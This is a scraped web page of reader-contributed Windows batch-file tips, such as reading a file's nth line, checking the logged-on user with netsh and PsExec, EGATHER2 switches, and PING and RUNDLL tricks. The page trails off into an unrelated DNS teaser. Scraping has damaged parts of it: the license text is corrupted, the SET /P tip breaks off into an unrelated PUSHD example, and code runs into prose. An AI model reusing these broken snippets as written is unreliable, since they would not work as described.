:: documentation and/or other materials provided with the distribution.
:: 3. Neither the name of copyright holders nor the names of its
:: contributors may be used to endorse or promote products derived
:: from this software without specific prior written permission.
::
:: THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
:: ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED
:: TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
:: PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL COPYRIGHT HOLDERS OR CONTRIBUTORS
:: BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
:: CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCU::ENT OF
:: SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
:: INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
:: CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
:: ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
:: POSSIBILITY OF SUCH DAMAGE.
::
@ECHO OFF
CALL :Put Me canse de escribir tantas lineas ...
CALL :Put Este es el typewritter effect reloaded
CALL :Put o echo dinamico xD
>NUL PAUSE
GOTO:EOF

:Put
IF NOT DEFINED .m_ SET.m_=%*
IF NOT DEFINED .m_ GOTO:EOF
NUL PING -n 10
SET .m_=%.m_:˜1%
IF DEFINED .m_ (GOTO:Put) ELSE (ECHO.)
GOTO:EOF

Try it out, and see if you understand how it works.

Thanks Carlos
Justin wrote:

I was looking at you tips and tricks section and noticed you have a way to get the first and last line of a text file, but what it you want the /nth /line of text...

This trick takes advantage of two features of NT batch, calling batch labels and GOTO :EOF, which of course ends a call(or batch). The folowing will get the third line of a text file and set it to the variable TEXT_LINE.

SET NthLine=3
SET /A NthLine-=1
CALL :LINEGRAB
GOTO RESTOFFILE

:LINEGRAB
FOR /F "skip=%NthLine% tokens=*" %%G IN (TEXTFILE.TXT) DO SET TEXT_LINE=%%G&&GOTO :EOF

:RESTOFFILE

There is one limitation to this, because for /f skips blank lines any blank lines will cause the line grabbed to be off.


Thanks Justin.

While adding this tip to this web page, the following idea came up (combining this tip with John Taylor's):

SET /A NthLine -= 1
TYPE textfile ˆ| MORE /E +%NthLine% > "%Temp%.\~nthline.tmp"
SET /P TextLine= < "%Temp%.\~nthline.tmp" This will also set the value of variable TextLine to the content of the nth line of textfile. A big advantage is MORE doesn't ignore empty lines. Unfortunately it involves the use of a temporary file. But how about this: SET NthLine=3 SET /A NthLine -= 1 CALL :LINEGRAB GOTO RESTOFFILE :LINEGRAB FOR /F "tokens=*" %%A IN ('MORE /E +%NthLine% TEXTFILE.TXT') DO ( SET TextLine=%%A GOTO:EOF ) :RESTOFFILE It doesn't use a temporary file. Any disadvantages, anyone...? Jeffrey Ehrhart wrote to me: • For the DIR command, adding the /S flag to the /B will fully qualify file and directory names. Of course, using the /S flag will search all subdirectories which may not be what you want. Examples: DIR /B /S C:\Temp C:\Temp\A.txt C:\Temp\B.txt DIR /B C:\Temp A.txt B.txt • If you add the /S flag when deleting a specific file, you will get a resulting message with the file name fully qualified. Again, use the /S flag with caution on a delete. Without the /S flag, you do not get a message. Example: C:\Temp>DEL /S A.txt
Deleted file - C:\Temp\A.txt
C:\Temp>


Thanks Jeffrey, I'll certainly keep that in mind.
But, as Jeffrey states, it is risky, unless of course there are no subdirectories involved.
A message from Matthew W. Helton:

Rob,

I feel your pain about finding a logged-on user... but there is hope from the most unlikely of places... using Netsh.

netsh diag show computer /v

Checkout near the bottom: UserName =
If there is no username, there is no logged-on user. Sweet!

Programmatically in Batch:

FOR /F "tokens=3" %%a IN ('netsh diag show computer /v ˆ| FIND /i "username"') DO ECHO %%a

Remotely using Batch via Psexec:

SET REMOTE_COMPUTER=%1
FOR /F "tokens=3" %%a IN ('PSEXEC.exe \\%REMOTE_COMPUTER% netsh diag show computer /v ˆ| FIND /i "username"') DO ECHO %%a

Note: this only gets you the locally logged-on user: Windows Server 2003 Terminal Services Users will not show up on this.


Great, thanks Matthew.

In theory, using NETSH's own -r \\%REMOTE_COMPUTER% switch should do the trick without the need for PSEXEC, but my own tests using this switch failed.
PSEXEC will do the trick.

Experiment with the output of the NETSH Diag Show Computer /V command, there is a lot of valuable information available.
A beautiful feature discovered by John Taylor: how to use SET /P to read the first line of a file and store it in an environment variable.
Try these commands, and notice the differences:

SET /P TestVar=> C:\pushdtest.log
POPD
CD >> C:\pushdtest.log

Run it twice, first from the command line, and then scheduled with your own credentials. C:\pushdtest.log should contain 4 (when run twice) lines like these:

X:\
C:\
X:\
C:\
A nice tip by Chris Greenbank:

Under XP (And I assume NT/2000 as well) it is possible to create a group of commands from the command line (not a batch file). This is useful for, among other things, copy&pasting scripts off of the internet for testing without saving. To do this, just type "(" and hit enter, enter each command one by one (or paste a previously copied list of commands), then type ")" and hit enter.

As well, it allows for groups of commands intended to be executed sequentially to be entered beforehand then allowed to run, useful if you are running external programs that you need to wait for and don't want to write a batch file for that specific job.

Output for every command may also be redirected at the end of the block, in the same manner as Tip 7 on the Clever Tricks page: ") > log.txt" instead of just ")"

C:\>(
More? cd
More? echo %windir%
More? echo This may be useful to someone wanting
More? echo to enter multiple commands in a row...
More? )

C:\
C:\WINDOWS
This may be useful to someone wanting
to enter multiple commands in a row...
C:\>

Thanks, Chris.
And another tip by Chris Greenbank, about escaping linefeeds:

Well, now I just found something more useful: A way to increase readability.

After thinking about why this works under NT/etc, I realized its because under windows, a physical linebreak is represented by 2 characters, and the escape character only escapes one of them, leaving the other there. My guess is that under OS/2, a linebreak is only a single character.

After some testing, I found that using just the second half of the linebreak, its possible to make it all neat and non-spaced out (the hex value is shown in notepad as a square, it won't provide a physical linebreak):

ECHO testˆ
testˆ<0a>
testˆ<0a>
test

will result in:

test
test
test
test

To use in a SET command:

SET var=testˆˆˆ<0a><0a>ˆ<0a>
testˆˆˆ<0a><0a>ˆ<0a>
testˆˆˆ<0a><0a>ˆ<0a>
test

ECHO %var%

will result in:

test
test
test
test

The reason that the <0a> is repeated twice is that the first one is ignored, which would be interpreted as ˆˆˆˆ which is not what is wanted. Having a few control codes on the end instead of excessive linebreaks is much more readable, while providing the same behaviour. The only requirement is that you be able to enter the correct value.

Thanks, Chris.
Martin Richards wrote about IBM's E-Gatherer tool:

I have [...] discovered that you can run 'egather2 -local' to output the native XML file rather than the .eg2 file.

You can also specify which information is output by egather2 by specify the probe name on the command line, eg:


egather2 -local -probe SYSTEM_SUMMARYYou can get a list of probe names to specify by running


egather2 -listprobesWell, this sure is a nice simple replacement for my (now obsolete) SNDisk2.bat.

Thanks, Martin

Continuing Martin's research I have discovered even more undocumented command line switches.
I used the command:


STRINGS -a EGATHER2.EXE | FINDSTR /R /B /I /C:"-[A-Z0-9][A-Z0-9]"to find the following possible switches:

-Y2
-ht
-wB
-binaryfile
-xmlfile
-textfile
-asciifile
-dgmlfile
-vpd
-stdout
-local
-probe
-probes
-listprobes
-html
-filename
-level
-debug
-step
-nolimit
-silent
-batch
-help
-64OS
-zcTry the -help switch and you'll notice that most of these switches are indeed undocumented.
Experiment with these switches, you may find some are of great value.
My favorite so far:

EGATHER2 -html -batchwhich I used in my new SNDisk3.bat.
Or add this one to your login script:

EGATHER2 -html -batch -filename\\remoteserver\remoteshare\%ComputerName%(no space between -filename and the actual file name; and no extension, the -html switch will take care of that)
From Fred Langa and several other sources came this tip to add a Compatibility Mode tab to all shortcuts' properties in Windows 2000 (SP2 or later).
Run the following command only once:

REGSVR32 %systemroot%\apppatch\slayerui.dllFrom that moment on you can choose to run any program in Windows 95 or NT 4 compatibility mode.
James Higgs sent me a nice PAUSE replacement using Windows 2000's SET /P:

ECHO Press Enter to continue . . .
SET /P =Unlike PAUSE, which accepts any key, SET /P will only accept the Enter key.

Josh Murray sent me an improvement, a one-liner with the same functionality:

SET /P =Press Enter to continue . . .Gabor Funk showed me this undocumented feature of the DIR command:

DIR,which is shorthand for:

DIR /AWorks only in COMMAND.COM (tested in Windows 2000).
An ingenious way to use CHOICE is demonstrated by Laurence Soucy's version(s) of BootDriv.bat.

:: bootdrv1.bat
@ECHO off
:: By Laurence Soucy
:: http://users.telenor.dk/~dsl645578/batfiles.htm::
:: To place drive letter into variable
ECHO %comspec%|choice.com/n/c%comspec% set bootdrv=>%temp%.\bootdrv$.bat
FOR %%c in (CALL DEL) do %%c %temp%.\bootdrv$.bat
ECHO "%bootdrv%"The same trick could be used to determine the current drive letter:

@ECHO OFF
CD | CHOICE /N /C:ABCDEFGHIJKLMNOPQRSTUVWXYZ SET curdrive=>%temp%.\curdrv$.bat
FOR %%A IN (CALL DEL) DO %%A %temp%.\curdrv$.bat
ECHO "%curdrive%"Tip (and the bootdrv* batch files themselves) provided by Laurence Soucy

Group commands for redirection:

To log the result of several commands, a commonly used method is

command1 > logfile.log
command2 >> logfile.log
command3 >> logfile.logIn Windows NT4/2000/XP command grouping can be used to simplify the code:

(
command1
command2
command3
) > logfile.logTip provided by Dave Denholm
Use VER to prevent NET USE asking for a password in NT:

VER | NET USE * \\server\share [ /USER:domain\user ]
Note: this will skip the drive mapping and display an error message if the user ID/password combination is invalid (in other words: if you don't have the rights you just won't get the drive mapping)

This trick works because VER's output starts with an empty line, which -- when redirected like this -- has the same result as pressing the Enter key

Tip provided by Justin F. Kuo
Check if a server is available:

A well known way to check if a server is stil "on the air" is

PING server | FIND "TTL=" >NUL
IF ERRORLEVEL 1 ECHO Error pinging serverIn Windows 95/98/NT this will result in 4 tries from PING to detect the presence of server.
When checking large amounts of servers, some time could be saved by a fast check, followed by a more thorough check only when the first check fails.

PING server -n 1 | FIND "TTL=" >NUL
IF NOT ERRORLEVEL 1 GOTO Next
PING server -w 3000 | FIND "TTL=" >NUL
IF ERRORLEVEL 1 ECHO Error pinging server
:NextTip provided by Mark Johnson, and improved (using "TTL=" instead of "TTL") by Richard Parvass
Swap your mouse to left handed use:
Windows 95:

RUNDLL USER.EXE,SwapMouseButton
Windows NT:

RUNDLL32 USER32.DLL,SwapMouseButton
Tip provided by "Speedy Gonzales"

I know of no command yet to undo this, but the following will get you close:

CONTROL MAIN.CPL
or:

RUNDLL32 SHELL32.DLL,Control_RunDLL MAIN.CPL,@0,1
Start DialUp Network:


START RUNDLL32 RNAUI.DLL,RnaDial exact name of dialer entry
TRACERT -h 1 -w 1
The RUNDLL command starts DUN, the TRACERT command is supposed to actually start the dialing process. Since I do not have access to any PC with DUN installed, I could not test the TRACERT command's effect.

Tip provided by Michael J. Gregg and Tom Lavedas on alt.msdos.batch
Resolve host name for specified IP address (Windows NT):

FOR /F "tokens=2 delims= " %%A IN ('PING -a %1 ˆ| FIND "[%1]"') DO ECHO.%%AThe HostName.bat examples use this trick.

Adapt the FIND /V part if you expect host names containing the (sub)string "TTL".

Tip provided by Marcel van der Wal
Enclose DEBUG scripts in batch file:


DEBUG < %0.BAT GOTO Around (do not skip this blank line) (original DEBUG script goes here) (do not skip this blank line) :Around Technique first seen at McAfee's site Check if a scheduled event job is active or not: Oskar Bäckström sent me this great tip: The win98 tasks scheduler creates .JOB files when you setup a program to run on a certain occasion. These .JOB files contain information about some things like the path to the program that should be run and probably when it will run. I've also seen that there's allways a character that indicates wether the .JOB file is active or not. Checking if a certain task will be run or not could then be done in a batch file: TYPE C:\Windows\Tasks\Thejobb.job | FIND "%character%" >NUL
IF NOT ERRORLEVEL 1 ECHO Job not active!
IF ERRORLEVEL 1 ECHO Job is active!Where %character% is the one character that will disappear from the .JOB file when it's activated.
I've found that the ASCII 196 is a pretty safe bet, but you should scan the file you want to test, both when you have it activated and when it is inactive.
Then check if it's really this character that differs (I suggest looking at it in notepad, thats how I did it).
If you're really unlucky the active-or-not charcter could be found twice in the file, on its active-or-not position and some other place, this test will then not work.
Check also that your program's name does not contain the control character.

Tip provided by Oskar Bäckström

Uncommon use of NT's SET /A switch:

As you may or may not be aware, it isn't necessary to specify a variable when using SET /A.
Try this:


SET /A 0XFFand you should see the number 255 (the decimal value of the hexadecimal number FF) on screen.
Used without a variable, the result of the mathematical expression is displayed on screen.
As explained on my "Useless Tips" page in more detail, the result is displayed without a carriage return/line feed at the end!

Tip provided by Ken Gould





A final word of thanks to all who sent me their tips and tricks.

Explaining DNS Concepts - DNS Servers-DNS Queries-DNS Records

3 types of DNS queries— recursive, iterative, and non-recursive 3 types of DNS servers— DNS Resolver, DNS Root Server and Authoritative Name...